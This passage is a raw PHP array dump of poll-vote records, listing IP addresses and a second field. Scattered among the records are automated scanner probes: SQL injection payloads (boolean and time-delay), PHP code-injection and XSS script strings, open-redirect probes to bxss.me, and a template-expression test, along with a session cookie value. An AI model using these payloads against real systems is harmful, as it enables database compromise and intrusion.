'sondage_id' => '2'
),
(int) 3276 => array(
'id' => '3819',
'ip' => '45.137.76.29',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 3277 => array(
'id' => '3820',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3278 => array(
'id' => '3821',
'ip' => 'http:bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3279 => array(
'id' => '3822',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3280 => array(
'id' => '3823',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3281 => array(
'id' => '3824',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3282 => array(
'id' => '3825',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3283 => array(
'id' => '3826',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3284 => array(
'id' => '3827',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3285 => array(
'id' => '3828',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3286 => array(
'id' => '3829',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3287 => array(
'id' => '3830',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3288 => array(
'id' => '3831',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3289 => array(
'id' => '3832',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3290 => array(
'id' => '3833',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3291 => array(
'id' => '3834',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3292 => array(
'id' => '3835',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3293 => array(
'id' => '3836',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3294 => array(
'id' => '3837',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3295 => array(
'id' => '3838',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3296 => array(
'id' => '3839',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3297 => array(
'id' => '3840',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3298 => array(
'id' => '3841',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3299 => array(
'id' => '3842',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3300 => array(
'id' => '3843',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3301 => array(
'id' => '3844',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3302 => array(
'id' => '3845',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3303 => array(
'id' => '3846',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3304 => array(
'id' => '3847',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3305 => array(
'id' => '3848',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3306 => array(
'id' => '3849',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3307 => array(
'id' => '3850',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3308 => array(
'id' => '3851',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3309 => array(
'id' => '3852',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3310 => array(
'id' => '3853',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3311 => array(
'id' => '3854',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3312 => array(
'id' => '3855',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3313 => array(
'id' => '3856',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3314 => array(
'id' => '3857',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3315 => array(
'id' => '3858',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3316 => array(
'id' => '3859',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3317 => array(
'id' => '3860',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3318 => array(
'id' => '3861',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3319 => array(
'id' => '3862',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3320 => array(
'id' => '3863',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3321 => array(
'id' => '3864',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3322 => array(
'id' => '3865',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3323 => array(
'id' => '3866',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3324 => array(
'id' => '3867',
'ip' => 'https:\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3325 => array(
'id' => '3868',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3326 => array(
'id' => '3869',
'ip' => 'https:\\bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3327 => array(
'id' => '3870',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3328 => array(
'id' => '3871',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3329 => array(
'id' => '3872',
'ip' => 'https:\\bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3330 => array(
'id' => '3873',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3331 => array(
'id' => '3874',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3332 => array(
'id' => '3875',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3333 => array(
'id' => '3876',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3334 => array(
'id' => '3877',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3335 => array(
'id' => '3878',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3336 => array(
'id' => '3879',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3337 => array(
'id' => '3880',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3338 => array(
'id' => '3881',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3339 => array(
'id' => '3882',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3340 => array(
'id' => '3883',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3341 => array(
'id' => '3884',
'ip' => '/\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3342 => array(
'id' => '3885',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3343 => array(
'id' => '3886',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3344 => array(
'id' => '3887',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3345 => array(
'id' => '3888',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3346 => array(
'id' => '3889',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3347 => array(
'id' => '3890',
'ip' => '/\/bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3348 => array(
'id' => '3891',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3349 => array(
'id' => '3892',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3350 => array(
'id' => '3893',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3351 => array(
'id' => '3894',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3352 => array(
'id' => '3895',
'ip' => '\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3353 => array(
'id' => '3896',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3354 => array(
'id' => '3897',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3355 => array(
'id' => '3898',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3356 => array(
'id' => '3899',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3357 => array(
'id' => '3900',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3358 => array(
'id' => '3901',
'ip' => '45.137.76.29',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 3359 => array(
'id' => '3902',
'ip' => '45.137.76.29',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 3360 => array(
'id' => '3903',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3361 => array(
'id' => '3904',
'ip' => '45.137.76.29',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 3362 => array(
'id' => '3905',
'ip' => '45.137.76.29',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 3363 => array(
'id' => '3906',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3364 => array(
'id' => '3907',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3365 => array(
'id' => '3908',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3366 => array(
'id' => '3909',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3367 => array(
'id' => '3910',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3368 => array(
'id' => '3911',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3369 => array(
'id' => '3912',
'ip' => '45.137.76.29'"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3370 => array(
'id' => '3913',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3371 => array(
'id' => '3914',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3372 => array(
'id' => '3915',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3373 => array(
'id' => '3916',
'ip' => '@@DVfWz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3374 => array(
'id' => '3917',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3375 => array(
'id' => '3918',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3376 => array(
'id' => '3919',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3377 => array(
'id' => '3920',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3378 => array(
'id' => '3921',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3379 => array(
'id' => '3922',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3380 => array(
'id' => '3923',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+94-94-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3381 => array(
'id' => '3924',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3382 => array(
'id' => '3925',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+227-227-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 3383 => array(
'id' => '3926',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+591-591-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3384 => array(
'id' => '3927',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+484-484-1=0+0+0+1 or 'PCqbwewl'='',
'sondage_id' => '2'
),
(int) 3385 => array(
'id' => '3928',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3386 => array(
'id' => '3929',
'ip' => '45.137.76.29',
'ip1' => '-1" OR 2+937-937-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3387 => array(
'id' => '3930',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3388 => array(
'id' => '3931',
'ip' => '45.137.76.29',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 3389 => array(
'id' => '3932',
'ip' => '45.137.76.29',
'ip1' => '<pre class=0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 3390 => array(
'id' => '3933',
'ip' => '45.137.76.29',
'ip1' => '<pre class=0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 3391 => array(
'id' => '3934',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3392 => array(
'id' => '3935',
'ip' => '45.137.76.29',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 3393 => array(
'id' => '3936',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3394 => array(
'id' => '3937',
'ip' => '45.137.76.29',
'ip1' => '<pre class=-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 3395 => array(
'id' => '3938',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3396 => array(
'id' => '3939',
'ip' => '45.137.76.29',
'ip1' => '<pre class=V57RCPwq' OR 844=(SELECT 844 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3397 => array(
'id' => '3940',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3398 => array(
'id' => '3941',
'ip' => '45.137.76.29',
'ip1' => '<pre class=kqgLqhcz') OR 803=(SELECT 803 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3399 => array(
'id' => '3942',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3400 => array(
'id' => '3943',
'ip' => '45.137.76.29',
'ip1' => '<pre class=3NvdKGLE')) OR 158=(SELECT 158 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3401 => array(
'id' => '3944',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3402 => array(
'id' => '3945',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3403 => array(
'id' => '3946',
'ip' => '45.137.76.29',
'ip1' => '<pre class='||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 3404 => array(
'id' => '3947',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3405 => array(
'id' => '3948',
'ip' => '45.137.76.29',
'ip1' => '<pre class='"',
'sondage_id' => '2'
),
(int) 3406 => array(
'id' => '3949',
'ip' => '45.137.76.29',
'ip1' => '@@QfatV',
'sondage_id' => '2'
),
(int) 3407 => array(
'id' => '3950',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3408 => array(
'id' => '3951',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3409 => array(
'id' => '3952',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3410 => array(
'id' => '3953',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3411 => array(
'id' => '3954',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3412 => array(
'id' => '3955',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3413 => array(
'id' => '3956',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3414 => array(
'id' => '3957',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3415 => array(
'id' => '3958',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3416 => array(
'id' => '3959',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3417 => array(
'id' => '3960',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3418 => array(
'id' => '3961',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3419 => array(
'id' => '3962',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3420 => array(
'id' => '3963',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3421 => array(
'id' => '3964',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3422 => array(
'id' => '3965',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3423 => array(
'id' => '3966',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3424 => array(
'id' => '3967',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3425 => array(
'id' => '3968',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3426 => array(
'id' => '3969',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3427 => array(
'id' => '3970',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3428 => array(
'id' => '3971',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3429 => array(
'id' => '3972',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3430 => array(
'id' => '3973',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3431 => array(
'id' => '3974',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3432 => array(
'id' => '3975',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3433 => array(
'id' => '3976',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3434 => array(
'id' => '3977',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3435 => array(
'id' => '3978',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3436 => array(
'id' => '3979',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3437 => array(
'id' => '3980',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3438 => array(
'id' => '3981',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3439 => array(
'id' => '3982',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3440 => array(
'id' => '3983',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3441 => array(
'id' => '3984',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3442 => array(
'id' => '3985',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3443 => array(
'id' => '3986',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3444 => array(
'id' => '3987',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3445 => array(
'id' => '3988',
'ip' => '45.137.76.299054676',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3446 => array(
'id' => '3989',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3447 => array(
'id' => '3990',
'ip' => '45.137.76.29',
'ip1' => '<pre class='"()&%<zzz><ScRiPt >aw5f(9830)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3448 => array(
'id' => '3991',
'ip' => '45.137.76.29',
'ip1' => ''"()&%<zzz><ScRiPt >aw5f(9101)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3449 => array(
'id' => '3992',
'ip' => '45.137.76.29',
'ip1' => '<pre class=9622090',
'sondage_id' => '2'
),
(int) 3450 => array(
'id' => '3993',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3451 => array(
'id' => '3994',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3452 => array(
'id' => '3995',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3453 => array(
'id' => '3996',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3454 => array(
'id' => '3997',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3455 => array(
'id' => '3998',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3456 => array(
'id' => '3999',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3457 => array(
'id' => '4000',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3458 => array(
'id' => '4001',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3459 => array(
'id' => '4002',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3460 => array(
'id' => '4003',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3461 => array(
'id' => '4004',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3462 => array(
'id' => '4005',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3463 => array(
'id' => '4006',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3464 => array(
'id' => '4007',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3465 => array(
'id' => '4008',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3466 => array(
'id' => '4009',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3467 => array(
'id' => '4010',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3468 => array(
'id' => '4011',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3469 => array(
'id' => '4012',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3470 => array(
'id' => '4013',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3471 => array(
'id' => '4014',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3472 => array(
'id' => '4015',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3473 => array(
'id' => '4016',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3474 => array(
'id' => '4017',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3475 => array(
'id' => '4018',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3476 => array(
'id' => '4019',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3477 => array(
'id' => '4020',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3478 => array(
'id' => '4021',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3479 => array(
'id' => '4022',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3480 => array(
'id' => '4023',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3481 => array(
'id' => '4024',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3482 => array(
'id' => '4025',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3483 => array(
'id' => '4026',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3484 => array(
'id' => '4027',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3485 => array(
'id' => '4028',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3486 => array(
'id' => '4029',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3487 => array(
'id' => '4030',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3488 => array(
'id' => '4031',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3489 => array(
'id' => '4032',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3490 => array(
'id' => '4033',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3491 => array(
'id' => '4034',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3492 => array(
'id' => '4035',
'ip' => 'OCrNJhzA',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3493 => array(
'id' => '4036',
'ip' => 'FDDg47L5: h7sKsxZ0',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3494 => array(
'id' => '4037',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3495 => array(
'id' => '4038',
'ip' => '45.11.82.145',
'ip1' => 'IkynVAQX',
'sondage_id' => '2'
),
(int) 3496 => array(
'id' => '4039',
'ip' => '${10000458+10000451}',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3497 => array(
'id' => '4040',
'ip' => '45.11.82.145',
'ip1' => 'Bu0JZTNT: 9zUCRMww',
'sondage_id' => '2'
),
(int) 3498 => array(
'id' => '4041',
'ip' => '45.11.82.145',
